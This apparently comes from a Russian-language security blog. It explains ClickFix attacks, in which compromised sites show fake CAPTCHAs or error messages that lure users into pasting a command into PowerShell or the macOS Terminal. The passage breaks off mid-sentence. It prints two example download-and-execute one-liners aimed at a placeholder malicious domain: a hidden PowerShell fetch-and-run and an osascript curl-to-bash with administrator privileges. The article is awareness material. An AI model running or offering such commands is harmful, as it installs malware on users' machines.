Введение в проблему: от сложных эксплойтов к социальной инженерии

Пока ваш SOC настраивает эвристику песочниц, а разработчики заделывают дыры в ядрах ОС, злоумышленники нагло кликают правой кнопкой мыши по вашей доверчивости. Представьте: вы заходите на привычный новостной сайт, а вместо статьи вас встречает плашка „Подтвердите, что вы не робот“ с деформированным шрифтом. Пара кликов, стандартная комбинация клавиш — и ваш корпоративный ноутбук уже качает стилер (ведь «работает на моей машине» теперь звучит как угроза). Никаких уязвимостей нулевого дня, никаких сложных эксплойтов. Добро пожаловать в эру ClickFix — атаки, где самый уязвимый компонент инфраструктуры сидит прямо перед монитором.

Атаки ClickFix стремительно становятся мейнстримом. Этот вектор эффективен как против Windows-систем, так и против macOS. Секрет популярности кроется в циничной простоте: хакерам больше не нужны уязвимости в браузерах. Достаточно скомпрометировать легитимный сайт, наложить поверх него интерфейсный оверлей и сыграть на человеческой невнимательности.

Когда казалось, что браузерные песочницы уже не пробить, злоумышленники решили эту проблему извне. Давайте разберем, как именно классическая доверчивость превращается в вектор заражения.

Анатомия атаки: пошаговый разбор цепочки заражения

Технически ClickFix элегантен своей простотой. Вся цепочка держится на компрометации веб-ресурсов и продвинутой социальной инженерии. Рассмотрим этапы атаки:

  1. Компрометация сайта: Злоумышленники получают доступ к популярному ресурсу (например, через уязвимости в CMS или украденные доступы) и внедряют вредоносный скрипт.
  2. Демонстрация фальшивой CAPTCHA: Пользователь видит знакомое окно проверки „Я не робот“ или сообщение об ошибке рендеринга страницы.
  3. Лжедиагностика: Интерфейс сообщает о сбое (например, „Ошибка буфера обмена: требуется верификация“) и предлагает инструкцию для исправления.
  4. Выполнение команды: Жертву просят открыть терминал (PowerShell или командную строку в Windows, Терминал в macOS), нажать комбинацию клавиш для вставки скопированного из браузера текста и нажать Enter.

В этот момент пользователь сам исполняет обфусцированный скрипт, который скачивает полезную нагрузку минуя защитные фильтры браузера.

Мало заставить пользователя скопировать текст — нужно сделать так, чтобы содержимое буфера обмена выглядело убедительно и не вызывало подозрений до самого нажатия Enter.

Техническая реализация: что скрывает буфер обмена

Самое интересное в ClickFix — это то, как именно злоумышленники доставляют код в буфер обмена. Современные браузеры имеют API для работы с буфером (Clipboard API), но скрипты часто используют классические трюки с невидимыми элементами DOM.

Когда пользователь кликает на кнопку „Скопировать решение“, JavaScript-код незаметно заменяет содержимое буфера. Пример вредоносной команды, которую обычно копирует жертва в Windows, выглядит следующим образом:

powershell -windowstyle hidden -command "Invoke-WebRequest -Uri 'http://malicious-domain[.]com/payload.ps1' -OutFile '$env:TEMP\update.ps1'; & '$env:TEMP\update.ps1'"

Для macOS сценарий аналогичен, но вместо PowerShell используется связка curl и osascript для выполнения цепочки команд в Terminal:

osascript -e 'do shell script "curl -s http://malicious-domain[.]com/payload.sh | bash" with administrator privileges'

Обратите внимание на флаг with administrator privileges или запросы пароля учетной записи в macOS — жертва добровольно вводит пароль, думая, что это часть „исправления ошибки“.

Запуск одной строчки из терминала редко заканчивается простым показом рекламы — чаще всего это лишь точка входа для целого арсенала киберпреступников.

Какие угрозы доставляет ClickFix?

Сам по себе ClickFix — это лишь мето